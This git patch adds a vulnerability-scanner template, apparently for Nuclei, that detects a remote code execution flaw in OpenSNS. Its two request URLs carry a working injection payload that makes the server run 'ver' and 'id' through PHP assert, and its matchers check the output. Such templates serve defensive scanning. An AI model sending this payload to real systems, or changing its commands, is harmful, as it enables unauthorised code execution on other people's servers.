From c3cbee27943c84210d48752431be6fe36bea54aa Mon Sep 17 00:00:00 2001
From: GwanYeong Kim <gy741.kim@gmail.com>
Date: Wed, 7 Jul 2021 18:49:36 +0900
Subject: [PATCH] Create opensns-rce.yaml

Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
---
 vulnerabilities/other/opensns-rce.yaml | 28 ++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 vulnerabilities/other/opensns-rce.yaml

diff --git a/vulnerabilities/other/opensns-rce.yaml b/vulnerabilities/other/opensns-rce.yaml
new file mode 100644
index 0000000000..5314c1d0ce
--- /dev/null
+++ b/vulnerabilities/other/opensns-rce.yaml
@@ -0,0 +1,28 @@
+id: opensns-rce
+
+info:
+  name: OpenSNS RCE
+  author: gy741
+  severity: critical
+  reference: http://www.0dayhack.net/index.php/2417/
+  tags: opensns,rce
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)'
+      - '{{BaseURL}}/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Microsoft Windows"
+          - "uid="
+          - "gid="
+          - "groups="
+        part: body
+
+      - type: status
+        status:
+          - 200